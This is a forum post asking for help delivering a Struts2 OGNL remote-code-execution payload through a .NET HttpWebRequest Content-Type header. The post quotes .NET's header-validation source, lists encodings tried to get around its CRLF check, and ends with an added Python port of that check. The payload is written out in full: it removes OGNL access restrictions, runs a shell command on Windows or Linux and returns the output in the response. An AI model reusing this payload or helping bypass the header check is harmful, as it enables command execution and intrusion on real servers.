Hello, bosses!
At the request of a friend, I am helping him test a web vulnerability.
After writing and running an HTTP GET that he thought was very simple, he found that he could not achieve the desired effect no matter what he tried.
HttpWebRequest
url = xxx,
method = GET,
content-type="%{(-sharp_="multipart/form-data").(-sharpdm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(-sharp_memberAccess?(-sharp_memberAccess=-sharpdm):((-sharpcontainer=-sharpcontext["com.opensymphony.xwork2.ActionContext.container"]).(-sharpognlUtil=-sharpcontainer.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(-sharpognlUtil.getExcludedPackageNames().clear()).(-sharpognlUtil.getExcludedClasses().clear()).(-sharpcontext.setMemberAccess(-sharpdm)))).(-sharpcmd="whoami").(-sharpiswin=(@java.lang.System@getProperty("os.name").toLowerCase().contains("win"))).(-sharpcmds=(-sharpiswin?{"cmd.exe","/c",-sharpcmd}:{"/bin/bash","-c",-sharpcmd})).(-sharpp=new (here is new line) java.lang.ProcessBuilder(-sharpcmds)).(-sharpp.redirectErrorStream(true)).(-sharpprocess=-sharpp.start()).(-sharpros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(-sharpprocess.getInputStream(),-sharpros)).(-sharpros.flush())}",
KeepAlive = false,
Timeout = 8000 (ms)
After running it, I found that the CRLF error raised when assigning the value to header.content-type comes from the space and line break in the string "p=new java".
Checking the stack and the official source, I see that there is a restriction in the framework metadata that the string may contain no spaces or line breaks: https://referencesource.micro.
internal static string CheckBadChars(string name, bool isHeaderValue) {
    if (name == null || name.Length == 0) {
        // empty name is invalid
        if (!isHeaderValue) {
            throw name == null ? new ArgumentNullException("name") :
                new ArgumentException(SR.GetString(SR.net_emptystringcall, "name"), "name");
        }
        // empty value is OK
        return string.Empty;
    }

    if (isHeaderValue) {
        // VALUE check
        // Trim spaces from both ends
        name = name.Trim(HttpTrimCharacters);

        // First, check for correctly formed multi-line value
        // Second, check for absence of CTL characters
        int crlf = 0;
        for (int i = 0; i < name.Length; ++i) {
            char c = (char) (0x000000ff & (uint) name[i]);
            switch (crlf)
            {
                case 0:
                    if (c == '\r')
                    {
                        crlf = 1;
                    }
                    else if (c == '\n')
                    {
                        // Technically this is bad HTTP. But it would be a breaking change to throw here.
                        // Is there an exploit?
                        crlf = 2;
                    }
                    else if (c == 127 || (c < ' ' && c != '\t'))
                    {
                        throw new ArgumentException(SR.GetString(SR.net_WebHeaderInvalidControlChars), "value");
                    }
                    break;

                case 1:
                    if (c == '\n')
                    {
                        crlf = 2;
                        break;
                    }
                    throw new ArgumentException(SR.GetString(SR.net_WebHeaderInvalidCRLFChars), "value");

                case 2:
                    if (c == ' ' || c == '\t')
                    {
                        crlf = 0;
                        break;
                    }
                    throw new ArgumentException(SR.GetString(SR.net_WebHeaderInvalidCRLFChars), "value");
            }
        }
        if (crlf != 0)
        {
            throw new ArgumentException(SR.GetString(SR.net_WebHeaderInvalidCRLFChars), "value");
        }
    }
    else {
        // NAME check
        // First, check for absence of separators and spaces
        if (name.IndexOfAny(ValidationHelper.InvalidParamChars) != -1) {
            throw new ArgumentException(SR.GetString(SR.net_WebHeaderInvalidHeaderChars), "name");
        }

        // Second, check for non CTL ASCII-7 characters (32-126)
        if (ContainsNonAsciiChars(name)) {
            throw new ArgumentException(SR.GetString(SR.net_WebHeaderInvalidNonAsciiChars), "name");
        }
    }
    return name;
}
I am asking all the bigwigs for help, because my friend has achieved the same GET request with Python and Java!
I tried the following methods:
\r\n: CRLF error
string concatenation: does not take effect
\u0008: CRLF error
\n: does not take effect
Please give me some suggestions. Thank you very much.
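Added here as an example that is not part of the original post: a Python port of the value branch of the .NET CheckBadChars method quoted above, so its decisions can be traced on sample header values (the \u0008 and bare \r\n attempts listed above both fail it, and a tab is the only control character it allows mid-value). HTTP_TRIM_CHARS is an assumed stand-in for the .NET field HttpTrimCharacters; everything else follows the C# logic.

```python
# Added example, not part of the original post: a Python port of the
# header-VALUE branch of .NET's WebHeaderCollection.CheckBadChars shown
# above, so its decision can be traced on sample values. HTTP_TRIM_CHARS
# is an assumption standing in for the .NET field HttpTrimCharacters.
HTTP_TRIM_CHARS = "\t\n\x0b\x0c\r "

class InvalidHeaderValue(ValueError):
    """Raised where the .NET code throws ArgumentException."""

def check_header_value(value: str) -> str:
    """Return the trimmed value if .NET would accept it, else raise.
    States (the 'crlf' variable in the C# source):
      0: text; CR -> 1, LF -> 2, any other CTL except HT -> reject
      1: saw CR; only LF may follow
      2: saw a line break; only SP or HT may follow (obs-fold);
         ending in state 1 or 2 (dangling line break) is rejected.
    """
    if not value:
        return ""  # empty value is OK
    value = value.strip(HTTP_TRIM_CHARS)
    crlf = 0
    for ch in value:
        c = ord(ch) & 0xFF  # C# masks each char to its low byte first
        if crlf == 0:
            if c == 0x0D:
                crlf = 1
            elif c == 0x0A:
                crlf = 2
            elif c == 0x7F or (c < 0x20 and c != 0x09):
                raise InvalidHeaderValue("control character in value")
        elif crlf == 1:
            if c != 0x0A:
                raise InvalidHeaderValue("CR not followed by LF")
            crlf = 2
        elif c not in (0x20, 0x09):  # crlf == 2
            raise InvalidHeaderValue("line break not followed by SP/HT")
        else:
            crlf = 0
    if crlf != 0:
        raise InvalidHeaderValue("value ends with a line break")
    return value

def classify(value: str) -> str:
    # 'accepted' or the rejection reason, for tabulating sample values
    try:
        check_header_value(value)
        return "accepted"
    except InvalidHeaderValue as exc:
        return str(exc)
```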